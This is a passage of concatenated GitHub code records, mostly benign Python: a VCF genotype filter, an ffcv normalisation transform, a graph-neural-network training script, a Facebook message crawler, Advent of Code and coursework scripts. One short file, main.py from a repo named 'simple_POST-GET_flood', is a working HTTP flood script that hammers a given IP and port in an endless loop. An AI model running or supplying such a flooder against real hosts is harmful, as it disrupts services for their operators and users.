1/2 genotype)\n\n # Convert the genotype strings (\"A/T\") to genotype allele sets {A,T}\n genotype_set = genotype_to_allele_set(genotype)\n if len(genotype_set) == expected_nr_unique_alleles and any(allele_of_interest in genotype_set for allele_of_interest in alleles_of_interest):\n number_of_genotypes_match_desired_state += 1\n\n # If all the required samples had the desired het or hom genotype return True\n if number_of_genotypes_match_desired_state == genotypes_samples_of_interest.size:\n return True\n else:\n return False\n\n\ndef count_genotypes_with_allele_of_interest(allele_sets, alleles_of_interest):\n \"\"\" Count the number of heterozygous and homozygous genotypes that contain at least 1 allele of interest\n\n allele_sets argument is a list with the set of alleles for alle samples\n alleles_of_interest is the alleles of interest for the allele type specified in the CLI\"\"\"\n\n count_het_genotype_with_allele_of_interest = 0\n count_hom_genotype_with_allele_of_interest = 0\n\n # Loop over the allele sets of all samples\n for allele_set in allele_sets:\n\n # If there is only 1 unique allele, the genotype is homozygous\n if len(allele_set) == 1:\n # if any allele of interest is in the allele set increase the hom genotype counter\n if any(allele_of_interest in allele_set for allele_of_interest in alleles_of_interest):\n count_hom_genotype_with_allele_of_interest += 1\n # Otherwise there are multiple distinct alleles and the genotype is heterozygous\n else:\n # if any allele of interest is in the allele set increase the het genotype counter\n if any(allele_of_interest in allele_set for allele_of_interest in alleles_of_interest):\n count_het_genotype_with_allele_of_interest += 1\n\n # Return a tuple with the number of genotypes that is heterozygous and homozygous for the alleles of interest\n return count_het_genotype_with_allele_of_interest, count_hom_genotype_with_allele_of_interest\n\n\ndef is_missing_genotype(genotype_string):\n \"\"\"Return True is a genotype is missing\"\"\"\n if genotype_string == \"./.\" or genotype_string == \".|.\" or genotype_string == \".\":\n return True\n else:\n return False\n\n\ndef genotype_to_allele_set(genotype_string):\n \"\"\"Convert a genotype string to a genotype set\n I.e. 
'A/T' to {'A','T'}\"\"\"\n\n if '/' in genotype_string:\n separate_char = \"/\"\n else:\n separate_char = \"|\"\n\n return set(genotype_string.split(separate_char))\n\n\ndef parse_arguments(args):\n\n parser = argparse.ArgumentParser(\n description=\"Filter a BCF/VCF input stream on genotype count and state.\")\n parser.add_argument('-i', '--input', type=argparse.FileType('r'), required=False, dest=\"input_file\",\n help=\"Input BCF/VCF file\")\n parser.add_argument('--allele_type', action='store', required=False, dest=\"allele_type\", choices=[\"nref\", \"alt1\", \"minor\", \"major\", \"nonmajor\" ], default=\"nref\",\n help=\"The type of allele on which the MIN and MAX genotype count and required samples list should be applied.\")\n parser.add_argument('--samples_required_het', action='store', type=str, required=False, dest='samples_required_het',\n help='Comma-separated list of samples that are required to be heterozygous for the allele type of interest')\n parser.add_argument('--samples_required_hom', action='store', type=str, required=False, dest='samples_required_hom',\n help='Comma-separated list of samples that are required to be homozygous for the allele type of interest')\n parser.add_argument('--min_het_genotype_count', action='store', type=int, required=False, dest='min_het_genotype_count',\n help='Minimum heterozygous genotype count for the allele type of interest')\n parser.add_argument('--max_het_genotype_count', action='store', type=int, required=False, dest='max_het_genotype_count',\n help='Maximum heterozygous genotype count for the allele type of interest')\n parser.add_argument('--min_hom_genotype_count', action='store', type=int, required=False, dest='min_hom_genotype_count',\n help='Minimum homozygous genotype count for the allele type of interest')\n parser.add_argument('--max_hom_genotype_count', action='store', type=int, required=False, dest='max_hom_genotype_count',\n help='Maximum homozygous genotype count for the allele type of interest')\n\n return parser.parse_args(args)\n\n\ndef print_variant(variant):\n \"\"\"Output a variant to standard out in the VCF format\"\"\"\n print(str(variant), end=\"\")\n\n\ndef apply_filter_criteria(input_vcf,\n allele_type,\n samples_required_het_arg,\n samples_required_hom_arg,\n min_het_genotype_count_arg,\n max_het_genotype_count_arg,\n min_hom_genotype_count_arg,\n max_hom_genotype_count_arg):\n \"\"\"Apply the filter criteria proved in the CLI to VCF input file or VCF input stream.\n Only output variants that pass all the filter criteria to standard out formatted as VCF\"\"\"\n\n # Create a reader for reading from file or stdin\n if input_vcf:\n reader = VCF(input_vcf.name)\n else:\n reader = VCF('-')\n\n # update and print header\n command_line_invocation = subprocess.list2cmdline(sys.argv)\n command_line_invocation = command_line_invocation.replace('\"', '')\n new_header_entry = {\"ID\": \"GenotypeStateAndCount\", \"Description\": command_line_invocation}\n reader.add_filter_to_header(new_header_entry)\n print(reader.raw_header, end=\"\")\n\n # Create boolean index for the required het and hom samples\n # This boolean index is used later to efficiently\n # retrieve the genotypes of required samples from all the variant genotypes\n samples_required_het_boolean_index = None\n samples_required_hom_boolean_index = None\n\n # If the samples that are required to be heterozygous have been specified in the CLI\n # Create the boolean index for the heterozygous samples\n if samples_required_het_arg:\n samples_required_het = 
samples_required_het_arg.split(\",\")\n samples_required_het_boolean_index = np.array([sample in samples_required_het for sample in reader.samples])\n # If the samples that are required to be homozygous have been specified in the CLI\n # Create the boolean index for the homozygous samples\n if samples_required_hom_arg:\n samples_required_hom = samples_required_hom_arg.split(\",\")\n samples_required_hom_boolean_index = np.array([sample in samples_required_hom for sample in reader.samples])\n\n # Numpy vectorize function to convert genotype strings to allele sets\n # Is applied later on to \"map\" all genotype strings to genotype allele sets\n vfunc=np.vectorize(genotype_to_allele_set)\n\n # Count variants that pass the filter criteria and are outputted, mainly for unit testing\n count_variants_pass = 0\n\n # Loop over all variants\n for variant in reader:\n\n # Determine the alleles of intererest for the allele type specified in the CLI\n alleles_of_interest = determine_alleles_of_interest(variant, allele_type)\n\n # If samples are required to be het and they aren't skip this variant\n if samples_required_het_arg and not samples_required_pass(variant, samples_required_het_boolean_index, alleles_of_interest, \"het\"):\n continue\n # If samples are required to be hom and they aren't skip this variant\n if samples_required_hom_arg and not samples_required_pass(variant, samples_required_hom_boolean_index, alleles_of_interest, \"hom\"):\n continue\n\n # If any MIN or MAX het/hom count is not none\n # Thus a there at least 1 filter criteria genotype count\n if min_het_genotype_count_arg is not None \\\n or max_het_genotype_count_arg is not None \\\n or min_hom_genotype_count_arg is not None\\\n or max_hom_genotype_count_arg is not None:\n\n # Convert genotype string array to genotype allele sets array\n allele_sets = vfunc(variant.gt_bases)\n\n # Count the number of genotypes that are heterozygous or homozygous for the alleles of interest\n count_het_genotype_with_allele_of_interest, count_hom_genotype_with_allele_of_interest = count_genotypes_with_allele_of_interest(allele_sets,\n alleles_of_interest)\n\n # Skip variant if count of het genotypes is lower than the minimum\n if min_het_genotype_count_arg is not None and count_het_genotype_with_allele_of_interest < min_het_genotype_count_arg:\n continue\n # Skip variant if count of het genotypes is higher than the maximum\n if max_het_genotype_count_arg is not None and count_het_genotype_with_allele_of_interest > max_het_genotype_count_arg:\n continue\n # Skip variant if count of hom genotypes is lower than the minimum\n if min_hom_genotype_count_arg is not None and count_hom_genotype_with_allele_of_interest < min_hom_genotype_count_arg:\n continue\n # Skip variant if count of hom genotypes is higher than the maximum\n if max_hom_genotype_count_arg is not None and count_hom_genotype_with_allele_of_interest > max_hom_genotype_count_arg:\n continue\n\n print_variant(variant)\n\n # Increment the number of variants that passed the filter criteria and are outputted\n count_variants_pass += 1\n\n return count_variants_pass\n\n\ndef main():\n\n args = parse_arguments(sys.argv[1:])\n\n apply_filter_criteria(args.input_file,\n args.allele_type,\n args.samples_required_het,\n args.samples_required_hom,\n args.min_het_genotype_count,\n args.max_het_genotype_count,\n args.min_hom_genotype_count,\n args.max_hom_genotype_count)\n\n\ndef wrap_in_list(object):\n \"\"\"If the object is not a list or tuple wrap the object (most often a string or integer) in a 
list\"\"\"\n\n if isinstance(object, list) or isinstance(object, tuple):\n return object\n else:\n return [object]\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"NeillGibson/VCF_genotype_state_and_count_filter","sub_path":"genotype_state_and_count_filter.py","file_name":"genotype_state_and_count_filter.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40422110046","text":"import os, fnmatch, operator\nfrom collections import OrderedDict\nfrom src.conversation import Conversation\nfrom src.conversation_util import get_message_number_per_conversation \n\ndef get_all_conversations(root_dir_path):\n filepaths = find(\"message_1.json\", root_dir_path)\n return get_all_conversations_from_filepaths(filepaths)\n\ndef get_all_conversations_from_filepaths(filepaths):\n conversations = []\n for filepath in filepaths:\n conversations.append(get_conversation_from_file(filepath))\n return conversations\n\ndef get_conversation_from_file(filepath):\n return Conversation(filepath)\n\ndef find(pattern, path):\n result = []\n for root, dirs, files in os.walk(path):\n for name in files:\n if fnmatch.fnmatch(name, pattern):\n result.append(os.path.join(root, name))\n return result\n\ndef main():\n files = find(\"message_1.json\", '/home/marcin/Projects/Facebook_analysis/messages/inbox/') \n print(len(files))\n conversation = get_conversation_from_file(files[0])\n print(conversation.participant_names)\n conversations = get_all_conversations_from_filepaths(files)\n print(len(conversations))\n conv_num = list(get_message_number_per_conversation(conversations))\n for i in range(30):\n print(i+1,':',conv_num[i])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MarcinWiech/Analyse-Your-Facebook-Information","sub_path":"src/file_crawler.py","file_name":"file_crawler.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19686132064","text":"logs = list()\nguard_time = dict()\nguard_logs = dict()\n\nwith open(\"input1.txt\") as file:\n for row in file:\n logs.append(row.strip())\n if \"begins shift\" in row:\n guard_time[int(row.split(\" \")[3][1:])] = 0\n guard_logs[int(row.split(\" \")[3][1:])] = dict()\n for x in range(60):\n guard_logs[int(row.split(\" \")[3][1:])][x] = 0\n\nlogs.sort()\n\ncurrent_guard = 0\nsleep = False\nstart_time = 0\nfor log in logs:\n if \"begins shift\" in log or current_guard == 0:\n sleep = False\n current_guard = int(log.split(\" \")[3][1:])\n else:\n if \"falls\" in log:\n start_time = int(log.split(\" \")[1][3:5])\n sleep = True\n if \"wakes\" in log:\n wake_time = int(log.split(\" \")[1][3:5])\n guard_time[current_guard] += (wake_time - start_time)\n for x in range(start_time, wake_time):\n guard_logs[current_guard][x] += 1\n sleep = False\n\n# part 1\nsleepiest_guard = max(guard_time, key=guard_time.get)\nsleepiest_minute = max(guard_logs[sleepiest_guard], key=guard_logs[sleepiest_guard].get)\nprint(sleepiest_guard*sleepiest_minute)\n\n# part 2\nmost_frequently_asleep_guard = 0\nmost_frequently_asleep_minute = 0\nmost_frequently_asleep_value = 0\nfor guard, guard_log in guard_logs.items():\n for minute, value in guard_log.items():\n if value > most_frequently_asleep_value:\n print(\"found new sleepier: {}\".format(value))\n most_frequently_asleep_guard = guard\n most_frequently_asleep_minute = minute\n most_frequently_asleep_value = 
value\n\nprint(most_frequently_asleep_guard*most_frequently_asleep_minute)\n","repo_name":"mkolas/advent2018","sub_path":"04/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71813128553","text":"import socket, os, string, argparse\r\n\r\n\r\nps = argparse.ArgumentParser()\r\nps.add_argument('-ip', type=str, required=True)\r\nps.add_argument('-p', type=int, required=True)\r\narg=ps.parse_args()\r\n\r\nIP_ADDR=arg.ip\r\nPORT=arg.p\r\n\r\ndef attack():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((IP_ADDR, PORT))\r\n request = \"GET / HTTP/1.1\\r\\nHost:%s\\r\\n\\r\\n\" % IP_ADDR\r\n s.send(request.encode())\r\n request2 = \"POST / HTTP/1.1\\r\\nHost:%s\\r\\n\\r\\n\" % IP_ADDR\r\n s.send(request2.encode())\r\n s.close()\r\n \r\nwhile True: \r\n attack()\r\n","repo_name":"chdbyq/simple_POST-GET_flood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41388538367","text":"\"\"\"\nImage normalization\n\"\"\"\nfrom collections.abc import Sequence\nfrom typing import Tuple\n\nimport numpy as np\nimport torch as ch\nfrom numpy import dtype\nfrom numpy.random import rand\nfrom dataclasses import replace\nfrom typing import Callable, Optional, Tuple\nfrom ..pipeline.allocation_query import AllocationQuery\nfrom ..pipeline.operation import Operation\nfrom ..pipeline.state import State\nfrom ..pipeline.compiler import Compiler\n\ndef ch_dtype_from_numpy(dtype):\n return ch.from_numpy(np.zeros((), dtype=dtype)).dtype\n\nclass NormalizeImage(Operation):\n \"\"\"Fast implementation of normalization and type conversion for uint8 images\n to any floating point dtype.\n\n Works on both GPU and CPU tensors.\n\n Parameters\n ----------\n mean: np.ndarray\n The mean vector.\n std: np.ndarray\n The standard deviation vector.\n type: np.dtype\n The desired output type for the result as a numpy type.\n If the transform is applied on a GPU tensor it will be converted\n as the equivalent torch dtype.\n \"\"\"\n\n def __init__(self, mean: np.ndarray, std: np.ndarray,\n type: np.dtype):\n super().__init__()\n table = (np.arange(256)[:, None] - mean[None, :]) / std[None, :]\n self.original_dtype = type\n table = table.astype(type)\n if type == np.float16:\n type = np.int16\n self.dtype = type\n table = table.view(type)\n self.lookup_table = table\n self.previous_shape = None\n self.mode = 'cpu'\n\n def generate_code(self) -> Callable:\n if self.mode == 'cpu':\n return self.generate_code_cpu()\n return self.generate_code_gpu()\n\n def generate_code_gpu(self) -> Callable:\n\n # We only import cupy if it's truly needed\n import cupy as cp\n import pytorch_pfn_extras as ppe\n\n tn = np.zeros((), dtype=self.dtype).dtype.name\n kernel = cp.ElementwiseKernel(f'uint8 input, raw {tn} table', f'{tn} output', 'output = table[input * 3 + i % 3];')\n final_type = ch_dtype_from_numpy(self.original_dtype)\n s = self\n def normalize_convert(images, result):\n B, C, H, W = images.shape\n table = self.lookup_table.view(-1)\n assert images.is_contiguous(memory_format=ch.channels_last), 'Images need to be in channel last'\n result = result[:B]\n result_c = result.view(-1)\n images = images.permute(0, 2, 3, 1).view(-1)\n\n current_stream = ch.cuda.current_stream()\n with ppe.cuda.stream(current_stream):\n kernel(images, table, result_c)\n\n # 
Mark the result as channel last\n final_result = result.reshape(B, H, W, C).permute(0, 3, 1, 2)\n\n assert final_result.is_contiguous(memory_format=ch.channels_last), 'Images need to be in channel last'\n\n return final_result.view(final_type)\n\n return normalize_convert\n\n def generate_code_cpu(self) -> Callable:\n\n table = self.lookup_table.view(dtype=self.dtype)\n my_range = Compiler.get_iterator()\n\n def normalize_convert(images, result, indices):\n result_flat = result.reshape(result.shape[0], -1, 3)\n num_pixels = result_flat.shape[1]\n for i in my_range(len(indices)):\n image = images[i].reshape(num_pixels, 3)\n for px in range(num_pixels):\n # Just in case llvm forgets to unroll this one\n result_flat[i, px, 0] = table[image[px, 0], 0]\n result_flat[i, px, 1] = table[image[px, 1], 1]\n result_flat[i, px, 2] = table[image[px, 2], 2]\n\n return result\n\n normalize_convert.is_parallel = True\n normalize_convert.with_indices = True\n return normalize_convert\n\n def declare_state_and_memory(self, previous_state: State) -> Tuple[State, Optional[AllocationQuery]]:\n\n if previous_state.device == ch.device('cpu'):\n new_state = replace(previous_state, jit_mode=True, dtype=self.dtype)\n return new_state, AllocationQuery(\n shape=previous_state.shape,\n dtype=self.dtype,\n device=previous_state.device\n )\n\n else:\n self.mode = 'gpu'\n new_state = replace(previous_state, dtype=self.dtype)\n\n gpu_type = ch_dtype_from_numpy(self.dtype)\n\n\n # Copy the lookup table into the proper device\n try:\n self.lookup_table = ch.from_numpy(self.lookup_table)\n except TypeError:\n pass # This is already a tensor\n self.lookup_table = self.lookup_table.to(previous_state.device)\n\n return new_state, AllocationQuery(\n shape=previous_state.shape,\n device=previous_state.device,\n dtype=gpu_type\n )","repo_name":"libffcv/ffcv","sub_path":"ffcv/transforms/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":2660,"dataset":"github-code","pt":"72"} +{"seq_id":"36133752484","text":"import os, sys\nimport tqdm\nimport argparse\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport pandas as pd\nimport time\n\nfrom FEGNN_model import FEGNN\nfrom utils import get_data, set_best_train_args\nfrom torch.utils.tensorboard import SummaryWriter\n\n\ndef one_run(args, seed, run, bar):\n \n torch.manual_seed(seed)\n if not args.no_cuda:\n torch.cuda.manual_seed(seed)\n\n args.seed = seed\n data = get_data(args) \n eye = torch.eye(args.nhid)\n model = FEGNN(ninput=data.x.shape[1], nclass=data.y.max()+1, args=args)\n\n if (not args.no_cuda) and torch.cuda.is_available():\n torch.cuda.set_device(args.cuda)\n data = data.cuda(args.cuda)\n model = model.cuda(args.cuda) \n eye = eye.cuda(args.cuda)\n\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n if not args.no_earlystop:\n best_epoch = 0\n best_val_acc = 0.\n bad_epochs = 0\n best_test_acc = 0.\n best_val_loss = 9999\n val_loss_history = []\n val_acc_history = []\n\n start_time = time.time()\n\n for epoch in range(args.epochs):\n bar.set_description('Run:{:2d}, epoch:{:4d}'.format(run, epoch))\n model.train()\n output = model(data) \n \n loss = F.nll_loss(output[data.train_mask], data.y[data.train_mask])\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n model.eval()\n \n output_eval = model(data) \n pred_eval = output_eval.argmax(dim=1)\n correct_eval = (pred_eval == data.y)\n\n 
val_loss = F.nll_loss(output_eval[data.val_mask], data.y[data.val_mask])\n val_acc = correct_eval[data.val_mask].sum() / data.val_mask.sum()\n test_acc = correct_eval[data.test_mask].sum() / data.test_mask.sum()\n\n bar.set_postfix(train_loss='{:.4f}'.format(loss.item()), \n val_loss='{:.4f}'.format(val_loss.item()),\n val_acc='{:.4f}'.format(val_acc.item()))\n\n if epoch > args.warmup: # warm up = 50\n\n val_loss_history.append(val_loss.item())\n val_acc_history.append(val_acc.item())\n\n if val_loss < best_val_loss:\n best_val_acc = val_acc\n best_val_loss = val_loss\n best_test_acc = test_acc\n best_epoch = epoch\n\n if not args.no_earlystop and epoch > args.patience + args.warmup:\n tmp_loss = torch.tensor(\n val_loss_history[-(args.patience + 1):-1])\n if val_loss > tmp_loss.mean().item():\n runtime = time.time() - start_time\n epoch_time = runtime / (epoch + 1)\n print(epoch_time)\n print('Best epoch %d for run %d: train loss: %.4f, val loss: %.4f, val acc: %.4f, test acc %.4f'%(\n best_epoch, run, loss, best_val_loss, best_val_acc, best_test_acc))\n break\n \n return best_test_acc.item(), best_val_acc.item()\n\n\ndef main():\n torch.set_num_threads(2)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\n parser.add_argument('--cuda', type=int, default=2, help='Cuda device.')\n parser.add_argument('--seed', type=int, default=42, help='Random seed (overridden per run).')\n \n parser.add_argument('--dataset', type=str, default='cora', help='Data set.')\n \n parser.add_argument('--dropout', type=float, default=0.5)\n\n\n parser.add_argument(\"--poly\", type=str, default='gpr', choices=['gpr', 'cheb', 'cheb2', 'bern', 'gcn', 'ours'])\n parser.add_argument('--K', type=int, default=2)\n\n parser.add_argument('--attn_nhid', type=int, default=8)\n parser.add_argument('--nhid', type=int, default=64)\n parser.add_argument('--xb', action='store_true', default=False)\n\n # training parameters\n parser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay for linear')\n parser.add_argument('--lr', type=float, default=0.01, help='Initial learning rate.')\n parser.add_argument('--epochs', type=int, default=1000, help='Number of epochs to train.')\n parser.add_argument('--no_earlystop', action='store_true', default=False, help='Set to train for all epochs without early stopping.')\n parser.add_argument('--patience', type=int, default=200, help='Patience (in epochs) for early stopping.')\n parser.add_argument('--runs', type=int, default=10, help='Runs to train.')\n\n # split parameters\n parser.add_argument('--split', type=str, default='random', choices=['random', 'set', 'grand'])\n parser.add_argument('--train_proportion', type=float, default=0.6, help='Train proportion')\n parser.add_argument('--val_proportion', type=float, default=0.2, help='Valid proportion')\n parser.add_argument('--idx', type=int, default=0, help='For multiple graphs, e.g. 
ppi has 20 graphs')\n\n parser.add_argument('--d', type=int, default=0, help='random dicts')\n parser.add_argument('--base', type=int, default=-1, help='random dicts')\n\n # # reg\n # parser.add_argument('--ortho', type=float, default=0., help='Dictionary matrix othogonal regularization')\n # parser.add_argument('--sp1', type=float, default=0., help='lin1 sparsity regularization')\n # parser.add_argument('--sp2', type=float, default=0., help='lin2 sparsity regularization')\n\n # FEGNN\n parser.add_argument('--nx', type=int, default=-1, help='hidden size for the node feature subdictionary, default -1 for use the feature\\'s size')\n parser.add_argument('--nlx', type=int, default=-1, help='hidden size for the interaction subdictionary, default -1 for use the feature\\'s size')\n parser.add_argument('--nl', type=int, default=0, help='hidden size for the sturcture subdictionary, default 0 for not using this subdictionary') # chameleon 700, squirrel 2000\n parser.add_argument('--share_lx', action='store_true', default=False, help='share the same w1 for different hops of lx')\n parser.add_argument('--warmup', type=int, default=50, help='random dicts')\n parser.add_argument('--no_use_best_args', action='store_true', default=False)\n\n args = parser.parse_args()\n if args.dataset.lower() in ['cs', 'physics']:\n args.split = 'grand'\n elif args.dataset.lower() in ['computers', 'photo', 'chameleon', 'squirrel', 'actor', 'texas', 'cornell']:\n args.split = 'random'\n\n if not args.no_use_best_args: # if use the best params\n args = set_best_train_args(args)\n print(args)\n\n for time in range(1):\n seeds=[0,1,2,3,4,5,6,7,8,9]\n\n pbar = tqdm.tqdm(range(args.runs))\n\n\n test_accs = []\n val_accs = []\n\n for idx in pbar:\n test_acc, val_acc = one_run(args, seed=seeds[idx], run=idx, bar=pbar)\n test_accs.append(test_acc)\n val_accs.append(val_acc)\n\n test_acc_mean = torch.Tensor(test_accs).mean().item()\n val_acc_mean = torch.Tensor(val_accs).mean().item()\n\n print('Average Test acc for {:s}: {:.4f}, Val acc: {:.4f}'.format(args.dataset, test_acc_mean, val_acc_mean))\n\n\nif __name__ == '__main__':\n main()\n \n\n\n\n \n \n \n\n","repo_name":"sajqavril/Feature-Extension-Graph-Neural-Networks","sub_path":"train_FEGNN.py","file_name":"train_FEGNN.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13806929845","text":"import pandas as pd\n\ndef combinacao3() :\n relacao = list()\n for d1 in range(1,3):\n for d2 in range (0,3):\n for d3 in range (0, 3):\n for pot in range (-2, 2, 1):\n resultado = (d1* pow(3, -1) + d2 * pow(3, -2) + d3 * pow(3, -3)) * pow(3,pot)\n linha = (\"Combinação 0.{}{}{} x 3^{}\".format(d1, d2, d3, pot) , resultado);\n relacao.append(linha)\n return relacao\n\ndef main():\n \n tabela = pd.DataFrame(combinacao3(), columns=[\"Mantissa base 3\" , \"Decimal\"])\n print(tabela)\n \n return 1\n\nmain()","repo_name":"guilhermegbraz/CalculoNumerico-UFABC-2022.3","sub_path":"Métodos encontrar raiz/src/python/combinacoes.py","file_name":"combinacoes.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31018768416","text":"from Bert.basic_semantic_search import BertSemanticSearch\nfrom data_loader import DataLoader\nfrom labeler import Labeler\n\nif __name__ == \"__main__\":\n posts_path = 
r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\anon.contributions.csv\"\n path_corpus = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\corpus.pkl\"\n path_corpus_embeddings = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\corpus_embeddings.pkl\"\n label_path = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\Labeler.pkl\"\n\n data_loader = DataLoader()\n data_loader.load(posts_path)\n\n qs, followup_qs = data_loader.questions_in_folder(\"\", index=True)\n as2, followup_as2 = data_loader.questions_in_folder(\"assignment2\", index=True)\n\n bert_s_s = BertSemanticSearch().from_files(path_corpus, path_corpus_embeddings)\n\n # label dataset\n labeler = Labeler(label_path)\n\n for i in range(len(as2)):\n idx, text = as2[i]\n choices_idx = bert_s_s.single_semantic_search(text, 10)\n\n labeler.label(\n text=text,\n text_idx=idx,\n choices=[qs[int(choice_idx)][1] for choice_idx in choices_idx],\n choices_idx=[qs[int(choice_idx)][0] for choice_idx in choices_idx]\n )\n print(labeler.labels)\n\n labeler.save()\n\n\n","repo_name":"Karl-Cui/piazzabot","sub_path":"label_with_bert.py","file_name":"label_with_bert.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12941912019","text":"# Function definition\n\ndef f(x):\n return 3 * x ** 2 - 2 * x + 5\n\n# Pure function\ndef pure_fun_sum(x, y):\n # use only the local function inputs\n return x + y\n\ndef crazy_function():\n return\n\nwhat_is_it = crazy_function()\n\ndef do_nothing_useful(i, j):\n x = i + j\n x = i - j\nresult = do_nothing_useful(10, 12)\nprint(result)\n# >>> print(result)\n# None\n\n# lambda functions\nlambda_add = lambda x, y: x +y\n\ndef greet01(name):\n print ('Ciao ', name)\n \ngreet02 = lambda name: print('Ciao ', name)\n\n# GUI, Callbacks\nimport sys\nfrom tkinter import Button, mainloop, messagebox, ttk\nimport tkinter as tk\nwin = tk.Tk()\nwin.geometry('400x300')\nwin.title('Using lambda callbacks')\n\ncombo = ttk.Combobox(\n state=\"readonly\",\n values=[\"imperative\", \"Object-Oriented\", \"Functional\", \"Distributed\"]\n )\ncombo.place(x=50, y=50)\n\nbtn = Button (\n win, text='Click Me',\n command=(lambda : messagebox.showinfo(\n 'Paradigm', combo.get() + \n '\\nProgramming!'\n )))\n\n# btn.pack()\nbtn.place(x=50, y=100)\nwin.mainloop()\n\n# lambda\ntpl = (2019, 3480.65)\nfst = lambda x: x[0]\nsnd = lambda x: x[1]\n\n\nfrom functools import reduce\nvlst = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nsummed_val = reduce(lambda n, m: n + m, vlst)\nfirst_val = reduce(lambda n, _: n, vlst)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Using pandas\n# ============\nimport pandas as pd\narray = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nseries3 = pd.DataFrame(array, columns=['Jan_23', 'Feb_23', 'Mar_23'])\nseries3\n\n","repo_name":"senker/programming-concepts-n-languages","sub_path":"python/session10-homework/class-session10.py","file_name":"class-session10.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"78732828","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import dblquad\nfrom scipy.integrate import nquad\n\n#####1\na = open('et.dat', 'r')\na_line = a.readlines()[1:]\n\ne = np.zeros(len(a_line))\nx = 
np.zeros(len(a_line))\n\nfor ii,i in enumerate(a_line):\n e[ii] = float(i.split(\" \")[0])\n x[ii] = float(i.split(\" \")[1])\n\ne_median = np.median(e)\ne_mean = np.mean(e)\n\nsigma_mu = np.sqrt(np.sum((e-e_mean)**2)/(len(e)*(len(e)-1)))\n\nprint(\"1.(1) e_median = \",e_median)\nprint(\" standard deviation of the mean = \",sigma_mu,\"\\n\")\n\n\nn = 1000\n\nmed_bost = np.zeros(n)\n\nfor i in range(n):\n xi = np.random.randint(len(e),size = len(e))\n sample_bost = e[xi]\n med_bost[i] = np.median(sample_bost)\n\nsort_med_bost = np.sort(med_bost)\n\n# fig , ax = plt.subplots(1)\n# ax.hist(sort_med_bost,40)\n# ax.axvline(sort_med_bost[841],color = 'r', linestyle='--')\n# ax.axvline(sort_med_bost[158],color = 'r', linestyle='--')\n# plt.show()\n\nprint(\" (2) upper(15.9%) std = \", sort_med_bost[840]- sort_med_bost[500])\nprint(\" lower(15.9%) std = \", sort_med_bost[499]- sort_med_bost[159],\"\\n\")\n\ne = e[(x<-10.6)]\n\nmed_bost2 = np.zeros(n)\n\nfor j in range(n):\n xj = np.random.randint(len(e),size = len(e))\n sample_bost = e[xj]\n med_bost2[j] = np.median(sample_bost)\n\nsort_med_bost2 = np.sort(med_bost2)\n\nprint(\" (3) e_mask_median = \",np.median(e))\nprint(\" bootstrap std = \",sort_med_bost2[840]-sort_med_bost[500],sort_med_bost2[159]-sort_med_bost2[499])\n\n#####2\nn = 1000\n\ndef gx(r,theta,pi):\n f = lambda rr , pp : (r*np.cos(theta)*np.cos(pi)-rr*np.cos(pp))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res \n\ndef gy(r,theta,pi):\n f = lambda rr , pp : (rr*np.sin(pp)- r*np.cos(theta)*np.sin(pi))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res\n\ndef gz(r,theta,pi):\n f = lambda rr , pp : (r*np.sin(theta))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res \n\nprint(gy(0.1,0,0))\n\n# def gx(r,theta,pi):\n# f = lambda rr , pp : (r*np.cos(theta)*np.cos(pi)-rr*np.cos(pp))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# # return dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1)\n# res, err = dblquad(f, 